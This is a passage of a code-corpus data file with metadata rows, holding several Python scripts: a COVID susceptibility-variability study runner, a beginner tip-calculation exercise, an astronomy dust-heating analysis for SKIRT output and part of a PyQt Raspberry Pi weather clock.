| 16.581395 | 35 | 0.730715 | 66 | 713 | 7.893939 | 0.560606 | 0.080614 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007105 | 0.210379 | 713 | 42 | 36 | 16.97619 | 0.918295 | 0 | 0 | 0.1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1 | 0 | 0.866667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
3219b2872136a395e8a2e3e3549ad44159209de5 | 2,661 | py | Python | scripts/variability_study_run.py | cshunk/covidsim | 9776efb0726af4f59b83fe6afcc9b7e6b9e967aa | [
"BSD-2-Clause"
] | null | null | null | scripts/variability_study_run.py | cshunk/covidsim | 9776efb0726af4f59b83fe6afcc9b7e6b9e967aa | [
"BSD-2-Clause"
] | null | null | null | scripts/variability_study_run.py | cshunk/covidsim | 9776efb0726af4f59b83fe6afcc9b7e6b9e967aa | [
"BSD-2-Clause"
] | 1 | 2021-03-08T16:48:38.000Z | 2021-03-08T16:48:38.000Z | """
Runs the susceptibility variability study.
Modify the params variable to set the parameters of the study.
Parameters:
pInfect: Rate of infection
pRemove: Rate of removal
pInfected: Starting percent of population that is infected
population: Approximate population of the test. Note: for certain network types (powerlaw cutoff) this
will only be approximate in order to maintain network statistical properties.
time_scale: Multiplier that converts model time units to days.
days_to_run: Cutoff number of days for model run.
variability_method: Method with which to vary the susceptibility of individuals. "constant", "gamma",
or "balanced_polynomial".
variability_param1: First parameter for variability method. For "balanced_polynomial", this is the exponent
to which a random fraction is raised. For "gamma", this is the shape of the gamma function.
For "constant", this is the susceptibility that will be applied to all individuals.
variability_param2: Second parameter for variability method. For "gamma", this is the scale of the gamma function.
intervention_1: A string representing the first intervention. The intervention will be applied from a start
day until an end day and have a certain percent chance per individual of cancelling an
infection. The string should be formatted "{day_start}, {day_end}, {effectiveness}".
intervention_2: A string representing a second intervention.
"""
import epyc
from dataclasses import asdict
from covidsim.experiments.variability_study import VariabilityExperiment
from covidsim.datastructures import VariabilityStudyParams
# TODO: Add UI to set / save / reload parameters.
# Parameter meanings are documented in the module docstring above.
params = VariabilityStudyParams()
params.pInfect = 0.5          # rate of infection
params.pRemove = 0.04         # rate of removal
params.pInfected = 0.002      # starting infected fraction of the population
params.population = 5000      # approximate population (exact only for some network types)
params.time_scale = .5        # multiplier converting model time units to days
params.days_to_run = 350      # cutoff number of days for the model run
params.network_type = 'powerlaw_cutoff'
params.variability_method = 'constant'   # "constant", "gamma", or "balanced_polynomial"
params.variability_param_1 = 0.058       # for "constant": susceptibility applied to everyone
params.variability_param_2 = 1           # for "gamma": scale of the gamma function
# params.intervention_1 = "18, 50, 0.5"
# params.intervention_2 = "100, 120, 0.1"
def main():
    """Run the variability experiment and record results in a lab notebook.

    Results, together with the full parameter set, are written to the
    epyc JSON lab notebook 'variability-study.json'.
    """
    e = VariabilityExperiment(params)

    # TODO: Add capability to save study file in user-specified location
    nb = epyc.JSONLabNotebook('variability-study.json')
    lab = epyc.Lab(nb)

    # Mirror every study parameter into the lab so epyc records them
    # alongside the results.  (Hoisted asdict() out of the loop: the
    # original re-evaluated it for every key.)
    for key, value in asdict(params).items():
        lab[key] = value

    # Repeat the experiment 7 times per parameter point.
    lab.runExperiment(epyc.RepeatedExperiment(e, 7))


if __name__ == "__main__":
    main()
| 40.318182 | 119 | 0.706877 | 338 | 2,661 | 5.467456 | 0.414201 | 0.010823 | 0.019481 | 0.031385 | 0.051407 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021941 | 0.229237 | 2,661 | 65 | 120 | 40.938462 | 0.879083 | 0.692973 | 0 | 0 | 0 | 0 | 0.065839 | 0.027329 | 0 | 0 | 0 | 0.015385 | 0 | 1 | 0.041667 | false | 0 | 0.166667 | 0 | 0.208333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5c4f330b1eecb840bd796102bfa5afeb13757022 | 410 | py | Python | aula2/exercicio1.py | ArseniumGX/bluemer-modulo1-python | 2f7c69252a9a86cc573c192d1d9685b0c20466f8 | [
"MIT"
] | null | null | null | aula2/exercicio1.py | ArseniumGX/bluemer-modulo1-python | 2f7c69252a9a86cc573c192d1d9685b0c20466f8 | [
"MIT"
] | null | null | null | aula2/exercicio1.py | ArseniumGX/bluemer-modulo1-python | 2f7c69252a9a86cc573c192d1d9685b0c20466f8 | [
"MIT"
] | null | null | null | """ 01
E os 10% do garçom?**
Defina uma variável para o valor de uma refeição que custou R$ 42,54;
Defina uma variável para o valor da taxa de serviço que é de 10%;
Defina uma variável que calcula o valor total da conta e exiba-o no console com essa
formatação: R$ XXXX.XX.
"""
# Meal bill plus the waiter's 10% service charge, printed as R$ XXXX.XX.
valor = 42.54  # price of the meal, in R$
taxa = 10      # service charge, in percent
servico = (valor * taxa) / 100  # service-charge amount
total = valor + servico
print(f'O valor total é: R$ {total:.2f}')
5c4fcde5d930a8c52566bd9877af8e54344d9963 | 9,969 | py | Python | CAAPR/CAAPR_AstroMagic/PTS/pts/do/modeling/seba/check_heating.py | wdobbels/CAAPR | 50d0b32642a61af614c22f1c6dc3c4a00a1e71a3 | [
"MIT"
] | 7 | 2016-05-20T21:56:39.000Z | 2022-02-07T21:09:48.000Z | CAAPR/CAAPR_AstroMagic/PTS/pts/do/modeling/seba/check_heating.py | wdobbels/CAAPR | 50d0b32642a61af614c22f1c6dc3c4a00a1e71a3 | [
"MIT"
] | 1 | 2019-03-21T16:10:04.000Z | 2019-03-22T17:21:56.000Z | CAAPR/CAAPR_AstroMagic/PTS/pts/do/modeling/seba/check_heating.py | wdobbels/CAAPR | 50d0b32642a61af614c22f1c6dc3c4a00a1e71a3 | [
"MIT"
] | 1 | 2020-05-19T16:17:17.000Z | 2020-05-19T16:17:17.000Z | #!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.do.modeling.check_heating
# -----------------------------------------------------------------
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import rc
rc('text', usetex=True)
import astropy.io.fits as pyfits
from scipy import interpolate
from scipy import integrate
def main():
    """Compare dust heating by old vs. young stellar populations.

    Reads SKIRT SED output for the total, old-only and young-only
    simulations, computes wavelength-dependent heating fractions,
    prints the globally integrated fractions, plots the fraction
    attributable to young ("unevolved") SPs, and finally writes
    per-pixel heating maps via makeHeatMap().
    """
    outpath = "modelChecks/iteration5_J14/"
    inpath = "SKIRTOutput/iteration5_J14/"
    inSED = "M31_212full_i77.5_sed.dat"

    Lsun = 3.846e26  # solar luminosity in Watts

    # load SEDs (column 0: wavelength, column 1: flux)
    input = np.loadtxt(inpath + inSED)
    wavelengths = input[:, 0]

    # Load the widths of the wavelength bins. Crucial for integration!
    delta_wls = np.loadtxt(
        "SKIRTOutput/iteration5_J14/M31_reference_wavelengths512.dat",
        usecols=(1,))

    # only consider wavelengths longwards of 10 micron, for speed and memory
    startwl = next(wl[0] for wl in enumerate(wavelengths) if wl[1] > 10.)
    coldstartwl = next(wl[0] for wl in enumerate(wavelengths) if wl[1] > 100.)

    # wavelength ranges for all, warm and cold dust
    dustwls = wavelengths[startwl:]
    warmwls = wavelengths[startwl:coldstartwl - 1]
    coldwls = wavelengths[coldstartwl:]
    delta_wls = delta_wls[startwl:]

    # Global heating fractions from the three SEDs.
    flux_all = input[startwl:, 1]
    input = np.loadtxt(inpath + inSED.replace('_i', '_old_i'))
    flux_old = input[startwl:, 1]
    input = np.loadtxt(inpath + inSED.replace('_i', '_young_i'))
    flux_young = input[startwl:, 1]

    # Symmetric estimator: average of the direct old flux and the total
    # minus the young flux (and vice versa), as a percentage of the total.
    Fold = 100. * (0.5 * flux_old + 0.5 * (flux_all - flux_young)) / flux_all
    Fyoung = 100. * (0.5 * flux_young + 0.5 * (flux_all - flux_old)) / flux_all
    # Alternative estimator normalised by (old + young) instead of total;
    # plotted below for comparison.  (Unused alternatives 1-3 and the
    # dead commented-out comparison plot were removed.)
    Fold_alternative4 = 100. * (0.5 * flux_old + 0.5 * (flux_all - flux_young)) / (flux_old + flux_young)
    Fyoung_alternative4 = 100. * (0.5 * flux_young + 0.5 * (flux_all - flux_old)) / (flux_old + flux_young)

    # Jy -> Lsun/micron conversion at a distance of 0.785 Mpc.
    JyToLsun = 1.e-26 * 4 * np.pi * (0.785e6 * 3.086e+16) ** 2 * 3.e14 / (dustwls ** 2) / Lsun

    # Integrate the SEDs over wavelength (rectangle rule, bin widths).
    # NOTE(review): the last wavelength bin is excluded (range(len-1)) —
    # presumably intentional; confirm against the wavelength-grid file.
    totFlux = 0
    totFlux_young = 0
    totFlux_old = 0
    for i in range(len(flux_all) - 1):
        totFlux += delta_wls[i] * flux_all[i] * JyToLsun[i]
        totFlux_young += delta_wls[i] * flux_young[i] * JyToLsun[i]
        totFlux_old += delta_wls[i] * flux_old[i] * JyToLsun[i]

    # BUG FIX: Python-2-only 'print x, y' statements replaced with
    # print() calls that work under both Python 2 and 3.
    print('Total heating from old stars: ' + str(totFlux_old / totFlux))
    print('Total heating from young stars: ' + str(totFlux_young / totFlux))

    ####################################################

    # Plot the fraction of dust luminosity heated by unevolved (young) SPs,
    # shading the band between the two estimators.
    plt.figure(figsize=(7, 5))
    plt.ylabel('$F^\prime_{\lambda,\mathrm{unev.}}$ [$\%$]', fontsize=20)
    plt.xlabel('$\lambda/\mu\mathrm{m}$', fontsize=20)
    plt.xlim(10., 1.e3)
    plt.ylim(0., 60.)
    plt.xscale('log')
    plt.tick_params(labelsize=20)
    plt.plot(dustwls, Fyoung, 'k-', label="Young SPs")
    plt.plot(dustwls, Fyoung_alternative4, 'k-', label="alt 4")
    plt.fill_between(dustwls, Fyoung, Fyoung_alternative4,
                     color='grey', alpha='0.5')
    plt.tight_layout()
    plt.savefig(outpath + inSED.replace('sed.dat', 'heating.pdf'), format='pdf')
    plt.close()

    # Make heating map
    inCube = inSED.replace('sed.dat', 'total.fits')
    makeHeatMap(inpath, outpath, inCube, startwl, dustwls, delta_wls)
    # Optional variants restricted to warm / cold dust only:
    # makeWarmHeatMap(inpath, outpath, inCube, startwl, coldstartwl - 1, warmwls)
    # makeColdHeatMap(inpath, outpath, inCube, coldstartwl, coldwls)
def makeHeatMap(inpath, outpath, inCube, startwl, dustwls, delta_wls):
    """Write per-pixel dust-heating maps as FITS files.

    Opens the total / old-only / young-only datacubes (wavelengths from
    index `startwl` on), writes the per-wavelength heating-fraction
    cubes, then the wavelength-integrated dust luminosities and the
    old/young fractions of the total.  clobber=True overwrites any
    existing output files.
    """
    cube = pyfits.open(inpath + inCube)
    cube_all = cube[0].data[startwl:, 0:, 0:]
    hdr_all = cube[0].header

    cube = pyfits.open(inpath + inCube.replace('_i', '_old_i'))
    cube_old = cube[0].data[startwl:, 0:, 0:]
    cube = pyfits.open(inpath + inCube.replace('_i', '_young_i'))
    cube_young = cube[0].data[startwl:, 0:, 0:]

    # Symmetric heating-fraction estimate, per pixel and wavelength (percent).
    Fold = 100. * (0.5 * cube_old + 0.5 * (cube_all - cube_young)) / cube_all
    hdu = pyfits.PrimaryHDU(Fold, hdr_all)
    hdu.writeto(outpath + "heatingFold.fits", clobber=True)

    Fyoung = 100. * (0.5 * cube_young + 0.5 * (cube_all - cube_old)) / cube_all
    hdu = pyfits.PrimaryHDU(Fyoung, hdr_all)
    hdu.writeto(outpath + "heatingFyoung.fits", clobber=True)

    # Wavelength-integrated luminosity per pixel for each component.
    pixelTot = integratePixelSEDs(cube_all, dustwls, delta_wls)
    pixelOld = integratePixelSEDs(cube_old, dustwls, delta_wls)
    pixelYoung = integratePixelSEDs(cube_young, dustwls, delta_wls)

    # Get header with appropriate WCS info
    im36 = pyfits.open("SKIRTinput/new3.6MJySr.fits")
    hdr_wcs = im36[0].header

    hdu = pyfits.PrimaryHDU(pixelTot, hdr_wcs)
    hdu.writeto(outpath + "Ldust_tot.fits", clobber=True)
    hdu = pyfits.PrimaryHDU(pixelOld, hdr_wcs)
    hdu.writeto(outpath + "Ldust_old.fits", clobber=True)
    hdu = pyfits.PrimaryHDU(pixelYoung, hdr_wcs)
    hdu.writeto(outpath + "Ldust_young.fits", clobber=True)
    hdu = pyfits.PrimaryHDU(pixelOld / pixelTot, hdr_wcs)
    hdu.writeto(outpath + "heatingTotOld.fits", clobber=True)
    hdu = pyfits.PrimaryHDU(pixelYoung / pixelTot, hdr_wcs)
    hdu.writeto(outpath + "heatingTotYoung.fits", clobber=True)

    # OLD AND INCORRECT?
    # tot_all = 100.* (dustwls[len(dustwls)-1] - dustwls[0])
    #
    # tot_old = integrateHeating(Fold,dustwls) / tot_all
    # hdu = pyfits.PrimaryHDU(tot_old,hdr_wcs)
    # hdu.writeto(outpath+"heatingTotOld.fits",clobber=True)
    #
    # tot_young = integrateHeating(Fyoung,dustwls) / tot_all
    # hdu = pyfits.PrimaryHDU(tot_young,hdr_wcs)
    # hdu.writeto(outpath+"heatingTotYoung.fits",clobber=True)
def makeWarmHeatMap(inpath, outpath, inCube, startwl, stopwl, warmwls):
    """Write per-pixel heating maps restricted to the warm-dust range.

    Same scheme as makeHeatMap, but only wavelengths between indices
    `startwl` and `stopwl`; the per-pixel heating fractions are averaged
    over the warm wavelength range (Simpson integration normalised by
    100 * the range width).
    """
    cube = pyfits.open(inpath + inCube)
    cube_all = cube[0].data[startwl:stopwl, 0:, 0:]
    hdr_all = cube[0].header

    cube = pyfits.open(inpath + inCube.replace('_i', '_old_i'))
    cube_old = cube[0].data[startwl:stopwl, 0:, 0:]
    cube = pyfits.open(inpath + inCube.replace('_i', '_young_i'))
    cube_young = cube[0].data[startwl:stopwl, 0:, 0:]

    # Symmetric heating-fraction estimate, per pixel and wavelength (percent).
    Fold = 100. * (0.5 * cube_old + 0.5 * (cube_all - cube_young)) / cube_all
    Fyoung = 100. * (0.5 * cube_young + 0.5 * (cube_all - cube_old)) / cube_all

    # Normalisation: 100% over the full warm wavelength span.
    tot_all = 100. * (warmwls[len(warmwls) - 1] - warmwls[0])

    # Get header with appropriate WCS info
    im36 = pyfits.open("SKIRTinput/new3.6MJySr.fits")
    hdr_wcs = im36[0].header

    tot_old = integrateHeating(Fold, warmwls) / tot_all
    hdu = pyfits.PrimaryHDU(tot_old, hdr_wcs)
    hdu.writeto(outpath + "heatingTotWarmOld.fits", clobber=True)

    tot_young = integrateHeating(Fyoung, warmwls) / tot_all
    hdu = pyfits.PrimaryHDU(tot_young, hdr_wcs)
    hdu.writeto(outpath + "heatingTotWarmYoung.fits", clobber=True)
def makeColdHeatMap(inpath, outpath, inCube, startwl, coldwls):
    """Write per-pixel heating maps restricted to the cold-dust range.

    Same scheme as makeWarmHeatMap but for wavelengths from index
    `startwl` to the end of the cube.
    """
    cube = pyfits.open(inpath + inCube)
    cube_all = cube[0].data[startwl:, 0:, 0:]
    hdr_all = cube[0].header

    cube = pyfits.open(inpath + inCube.replace('_i', '_old_i'))
    cube_old = cube[0].data[startwl:, 0:, 0:]
    cube = pyfits.open(inpath + inCube.replace('_i', '_young_i'))
    cube_young = cube[0].data[startwl:, 0:, 0:]

    # Symmetric heating-fraction estimate, per pixel and wavelength (percent).
    Fold = 100. * (0.5 * cube_old + 0.5 * (cube_all - cube_young)) / cube_all
    Fyoung = 100. * (0.5 * cube_young + 0.5 * (cube_all - cube_old)) / cube_all

    # Normalisation: 100% over the full cold wavelength span.
    tot_all = 100. * (coldwls[len(coldwls) - 1] - coldwls[0])

    # Get header with appropriate WCS info
    im36 = pyfits.open("SKIRTinput/new3.6MJySr.fits")
    hdr_wcs = im36[0].header

    tot_old = integrateHeating(Fold, coldwls) / tot_all
    hdu = pyfits.PrimaryHDU(tot_old, hdr_wcs)
    hdu.writeto(outpath + "heatingTotColdOld.fits", clobber=True)

    tot_young = integrateHeating(Fyoung, coldwls) / tot_all
    hdu = pyfits.PrimaryHDU(tot_young, hdr_wcs)
    hdu.writeto(outpath + "heatingTotColdYoung.fits", clobber=True)
def integratePixelSEDs(cube, wls, dwls):
    """Integrate each pixel's SED over wavelength into a 2-D luminosity map.

    Parameters
    ----------
    cube : 3-D array with wavelength on axis 0 and (y, x) on axes 1, 2,
        in MJy/sr (per the conversion factor below).
    wls : 1-D array of wavelengths in micron, matching cube's axis 0.
    dwls : 1-D array of wavelength-bin widths in micron.

    Returns a (y, x) array in solar luminosities.
    """
    Lsun = 3.846e26  # Watts
    # MJy/sr -> Lsun/micron per pixel; the constants encode a pixel scale
    # of 36 (arcsec, presumably — confirm) and a distance of 0.785 Mpc
    # (0.785e6 pc * 3.086e16 m/pc).
    MjySr_to_LsunMicron = (1.e6 * (36. / 206264.806247) ** 2 * 1.e-26 *
                           4 * np.pi * (0.785e6 * 3.086e+16) ** 2 *
                           3.e14 / (wls ** 2) / Lsun)
    # Weighted sum over the wavelength axis for every pixel at once.
    # Equivalent to the original per-pixel double loop
    # (slice[i, j] = sum(cube[:, i, j] * conv * dwls)) but vectorized,
    # and drops the unused zaxis variable.
    weights = MjySr_to_LsunMicron * dwls
    return np.tensordot(weights, cube, axes=(0, 0))
def integrateHeating(cube, dustwls):
    """Integrate each pixel's spectrum over wavelength with Simpson's rule.

    Parameters
    ----------
    cube : 3-D array with wavelength on axis 0 and (y, x) on axes 1, 2.
    dustwls : 1-D array of wavelengths matching cube's axis 0.

    Returns a (y, x) array of wavelength-integrated values.
    """
    # scipy renamed integrate.simps to integrate.simpson; the old alias
    # was removed in scipy 1.14 — support both.
    simpson = getattr(integrate, 'simpson', None) or integrate.simps
    # Integrate along the wavelength axis for all pixels at once.
    # Equivalent to the original per-pixel double loop
    # (slice[i, j] = simps(cube[:, i, j], dustwls)) but vectorized,
    # and drops the unused zaxis variable.
    return simpson(cube, x=dustwls, axis=0)


if __name__ == '__main__':
    main()
5c518a7aefaa27641c2404d80d6ad365a3bb2bb2 | 40,140 | py | Python | Clock/PyQtPiClock.py | tonymorris/PiClock | d5a1b96eaef012834844b4c34e2344ec5671031b | [
"MIT"
] | 2 | 2017-07-03T16:13:27.000Z | 2017-07-03T16:13:49.000Z | Clock/PyQtPiClock.py | tonymorris/PiClock | d5a1b96eaef012834844b4c34e2344ec5671031b | [
"MIT"
] | null | null | null | Clock/PyQtPiClock.py | tonymorris/PiClock | d5a1b96eaef012834844b4c34e2344ec5671031b | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*- # NOQA
import sys
import os
import platform
import signal
import datetime
import time
import json
import locale
import random
import re
from PyQt4 import QtGui, QtCore, QtNetwork
from PyQt4.QtGui import QPixmap, QMovie, QBrush, QColor, QPainter
from PyQt4.QtCore import QUrl
from PyQt4.QtCore import Qt
from PyQt4.QtNetwork import QNetworkReply
from PyQt4.QtNetwork import QNetworkRequest
from subprocess import Popen
sys.dont_write_bytecode = True
from GoogleMercatorProjection import getCorners # NOQA
import ApiKeys # NOQA
def tick():
    """Per-tick clock refresh: redraw the digital text or analog hands,
    and update the time/date labels when the minute or day rolls over.

    NOTE(review): indentation of this chunk was reconstructed; nesting
    (hour/minute hands updated only inside the analog branch, and only
    when the minute changes) follows the logic — confirm upstream.
    """
    global hourpixmap, minpixmap, secpixmap
    global hourpixmap2, minpixmap2, secpixmap2
    global lastmin, lastday, lasttimestr
    global clockrect
    global datex, datex2, datey2, pdy

    if Config.DateLocale != "":
        try:
            locale.setlocale(locale.LC_TIME, Config.DateLocale)
        except:
            # best-effort: keep the current locale if the configured one fails
            pass

    now = datetime.datetime.now()
    if Config.digital:
        timestr = Config.digitalformat.format(now)
        if Config.digitalformat.find("%I") > -1:
            # 12-hour format: strip a leading zero from the hour
            if timestr[0] == '0':
                timestr = timestr[1:99]
        if lasttimestr != timestr:
            clockface.setText(timestr.lower())
        lasttimestr = timestr
    else:
        # Analog clock: rotate the second hand every tick (6 deg/second),
        # scaling the hand pixmap to the clock face size.
        angle = now.second * 6
        ts = secpixmap.size()
        secpixmap2 = secpixmap.transformed(
            QtGui.QMatrix().scale(
                float(clockrect.width()) / ts.height(),
                float(clockrect.height()) / ts.height()
            ).rotate(angle),
            Qt.SmoothTransformation
        )
        sechand.setPixmap(secpixmap2)
        ts = secpixmap2.size()
        # Center the rotated pixmap on the clock face.
        sechand.setGeometry(
            clockrect.center().x() - ts.width() / 2,
            clockrect.center().y() - ts.height() / 2,
            ts.width(),
            ts.height()
        )
        if now.minute != lastmin:
            lastmin = now.minute
            # Minute hand: 6 degrees per minute.
            angle = now.minute * 6
            ts = minpixmap.size()
            minpixmap2 = minpixmap.transformed(
                QtGui.QMatrix().scale(
                    float(clockrect.width()) / ts.height(),
                    float(clockrect.height()) / ts.height()
                ).rotate(angle),
                Qt.SmoothTransformation
            )
            minhand.setPixmap(minpixmap2)
            ts = minpixmap2.size()
            minhand.setGeometry(
                clockrect.center().x() - ts.width() / 2,
                clockrect.center().y() - ts.height() / 2,
                ts.width(),
                ts.height()
            )
            # Hour hand: 30 degrees per hour plus minute fraction.
            angle = ((now.hour % 12) + now.minute / 60.0) * 30.0
            ts = hourpixmap.size()
            hourpixmap2 = hourpixmap.transformed(
                QtGui.QMatrix().scale(
                    float(clockrect.width()) / ts.height(),
                    float(clockrect.height()) / ts.height()
                ).rotate(angle),
                Qt.SmoothTransformation
            )
            hourhand.setPixmap(hourpixmap2)
            ts = hourpixmap2.size()
            hourhand.setGeometry(
                clockrect.center().x() - ts.width() / 2,
                clockrect.center().y() - ts.height() / 2,
                ts.width(),
                ts.height()
            )

    # Secondary time label, updated only when the displayed string changes.
    dy = "{0:%I:%M %p}".format(now)
    if dy != pdy:
        pdy = dy
        datey2.setText(dy)

    if now.day != lastday:
        lastday = now.day
        # date
        # Pick the English ordinal suffix; suppressed for non-default locales.
        sup = 'th'
        if (now.day == 1 or now.day == 21 or now.day == 31):
            sup = 'st'
        if (now.day == 2 or now.day == 22):
            sup = 'nd'
        if (now.day == 3 or now.day == 23):
            sup = 'rd'
        if Config.DateLocale != "":
            sup = ""
        ds = "{0:%A %B} {0.day}<sup>{1}</sup> {0.year}".format(now, sup)
        datex.setText(ds)
        datex2.setText(ds)
def tempfinished():
    """Callback for the indoor-temperature HTTP reply (see gettemp).

    Parses the JSON payload (expected keys: 'temp' and 'temps', a
    sensor-name -> reading map — TODO confirm against the temperature
    service) and updates the `temp` label, converting F -> C when
    Config.metric is set.
    """
    global tempreply, temp
    if tempreply.error() != QNetworkReply.NoError:
        return
    tempstr = str(tempreply.readAll())
    tempdata = json.loads(tempstr)
    if tempdata['temp'] == '':
        return
    if Config.metric:
        # Service reports Fahrenheit; convert to Celsius for display.
        s = Config.LInsideTemp + \
            "%3.1f" % ((float(tempdata['temp']) - 32.0) * 5.0 / 9.0)
        if tempdata['temps']:
            if len(tempdata['temps']) > 1:
                # Multiple sensors: list each as " name:value" instead.
                s = ''
                for tk in tempdata['temps']:
                    s += ' ' + tk + ':' + \
                        "%3.1f" % (
                            (float(tempdata['temps'][tk]) - 32.0) * 5.0 / 9.0)
    else:
        s = Config.LInsideTemp + tempdata['temp']
        if tempdata['temps']:
            if len(tempdata['temps']) > 1:
                s = ''
                for tk in tempdata['temps']:
                    s += ' ' + tk + ':' + tempdata['temps'][tk]
    temp.setText(s)
def gettemp():
    """Start an async HTTP request to the local temperature service
    (port 48213); tempfinished() handles the reply."""
    global tempreply
    host = 'localhost'
    if platform.uname()[1] == 'KW81':
        host = 'piclock.local'  # this is here just for testing
    r = QUrl('http://' + host + ':48213/temp')
    r = QNetworkRequest(r)
    tempreply = manager.get(r)
    tempreply.finished.connect(tempfinished)
def wxfinished():
    """Parse the Weather Underground reply and refresh every weather widget.

    Updates the current-conditions labels on both frames, the sun/moon
    summary line, the first three forecast slots (3-hourly) and the last
    six (daily).  All widgets and the reply object are module globals.
    """
    global wxreply, wxdata
    global wxicon, temper, wxdesc, press, humidity
    global wind, wind2, wdate, bottom, forecast
    # NOTE(review): 'wxdesc' appears twice in these global lists and
    # 'wxdesc2' (used below) is missing; harmless because the names are
    # only read here, never rebound.
    global wxicon2, temper2, wxdesc
    wxstr = str(wxreply.readAll())
    wxdata = json.loads(wxstr)
    f = wxdata['current_observation']
    # Icon URLs containing '/nt_' are night variants; the local icon
    # files use an 'n_' prefix for those.
    iconurl = f['icon_url']
    icp = ''
    if (re.search('/nt_', iconurl)):
        icp = 'n_'
    wxiconpixmap = QtGui.QPixmap(Config.icons + "/" + icp + f['icon'] + ".png")
    wxicon.setPixmap(wxiconpixmap.scaled(
        wxicon.width(), wxicon.height(), Qt.IgnoreAspectRatio,
        Qt.SmoothTransformation))
    wxicon2.setPixmap(wxiconpixmap.scaled(
        wxicon.width(),
        wxicon.height(),
        Qt.IgnoreAspectRatio,
        Qt.SmoothTransformation))
    wxdesc.setText(f['weather'])
    wxdesc2.setText(f['weather'])
    # Current conditions in the configured unit system.
    if Config.metric:
        temper.setText(str(f['temp_c']) + u'°C')
        temper2.setText(str(f['temp_c']) + u'°C')
        press.setText(Config.LPressure +
                      f['pressure_mb'] + ' ' + f['pressure_trend'])
        humidity.setText(Config.LHumidity + f['relative_humidity'])
        wd = f['wind_dir']
        if Config.wind_degrees:
            wd = str(f['wind_degrees']) + u'°'
        wind.setText(Config.LWind +
                     wd + ' ' +
                     str(f['wind_kph']) +
                     Config.Lgusting +
                     str(f['wind_gust_kph']))
        wind2.setText(Config.LFeelslike + str(f['feelslike_c']))
        wdate.setText("{0:%H:%M}".format(datetime.datetime.fromtimestamp(
            int(f['local_epoch']))) +
            Config.LPrecip1hr + f['precip_1hr_metric'] + 'mm ' +
            Config.LToday + f['precip_today_metric'] + 'mm')
    else:
        temper.setText(str(f['temp_f']) + u'°F')
        temper2.setText(str(f['temp_f']) + u'°F')
        press.setText(Config.LPressure +
                      f['pressure_in'] + ' ' + f['pressure_trend'])
        humidity.setText(Config.LHumidity + f['relative_humidity'])
        wd = f['wind_dir']
        if Config.wind_degrees:
            wd = str(f['wind_degrees']) + u'°'
        wind.setText(Config.LWind + wd + ' ' +
                     str(f['wind_mph']) + Config.Lgusting +
                     str(f['wind_gust_mph']))
        wind2.setText(Config.LFeelslike + str(f['feelslike_f']))
        wdate.setText("{0:%H:%M}".format(datetime.datetime.fromtimestamp(
            int(f['local_epoch']))) +
            Config.LPrecip1hr + f['precip_1hr_in'] + 'in ' +
            Config.LToday + f['precip_today_in'] + 'in')
    bottom.setText(Config.LSunRise +
                   wxdata['sun_phase']['sunrise']['hour'] + ':' +
                   wxdata['sun_phase']['sunrise']['minute'] +
                   Config.LSet +
                   wxdata['sun_phase']['sunset']['hour'] + ':' +
                   wxdata['sun_phase']['sunset']['minute'] +
                   Config.LMoonPhase +
                   wxdata['moon_phase']['phaseofMoon']
                   )
    # Slots 0-2: hourly forecast sampled every 3 hours, offset +2 so the
    # first slot is a little in the future.
    for i in range(0, 3):
        f = wxdata['hourly_forecast'][i * 3 + 2]
        fl = forecast[i]
        iconurl = f['icon_url']
        icp = ''
        if (re.search('/nt_', iconurl)):
            icp = 'n_'
        icon = fl.findChild(QtGui.QLabel, "icon")
        wxiconpixmap = QtGui.QPixmap(
            Config.icons + "/" + icp + f['icon'] + ".png")
        icon.setPixmap(wxiconpixmap.scaled(
            icon.width(),
            icon.height(),
            Qt.IgnoreAspectRatio,
            Qt.SmoothTransformation))
        wx = fl.findChild(QtGui.QLabel, "wx")
        wx.setText(f['condition'])
        day = fl.findChild(QtGui.QLabel, "day")
        day.setText(f['FCTTIME']['weekday_name'] + ' ' + f['FCTTIME']['civil'])
        wx2 = fl.findChild(QtGui.QLabel, "wx2")
        # Build "pop% [snow|rain amount] temp" summary text.
        s = ''
        if float(f['pop']) > 0.0:
            s += f['pop'] + '% '
        if Config.metric:
            if float(f['snow']['metric']) > 0.0:
                s += Config.LSnow + f['snow']['metric'] + 'mm '
            else:
                if float(f['qpf']['metric']) > 0.0:
                    s += Config.LRain + f['qpf']['metric'] + 'mm '
            s += f['temp']['metric'] + u'°C'
        else:
            if float(f['snow']['english']) > 0.0:
                s += Config.LSnow + f['snow']['english'] + 'in '
            else:
                if float(f['qpf']['english']) > 0.0:
                    s += Config.LRain + f['qpf']['english'] + 'in '
            s += f['temp']['english'] + u'°F'
        wx2.setText(s)
    # Slots 3-8: daily simple forecast.
    for i in range(3, 9):
        f = wxdata['forecast']['simpleforecast']['forecastday'][i - 3]
        fl = forecast[i]
        icon = fl.findChild(QtGui.QLabel, "icon")
        wxiconpixmap = QtGui.QPixmap(Config.icons + "/" + f['icon'] + ".png")
        icon.setPixmap(wxiconpixmap.scaled(
            icon.width(),
            icon.height(),
            Qt.IgnoreAspectRatio,
            Qt.SmoothTransformation))
        wx = fl.findChild(QtGui.QLabel, "wx")
        wx.setText(f['conditions'])
        day = fl.findChild(QtGui.QLabel, "day")
        day.setText(f['date']['weekday'])
        wx2 = fl.findChild(QtGui.QLabel, "wx2")
        # Build "pop% [snow|rain amount] high/low" summary text.
        s = ''
        if float(f['pop']) > 0.0:
            s += str(f['pop']) + '% '
        if Config.metric:
            if float(f['snow_allday']['cm']) > 0.0:
                s += Config.LSnow + str(f['snow_allday']['cm']) + 'cm '
            else:
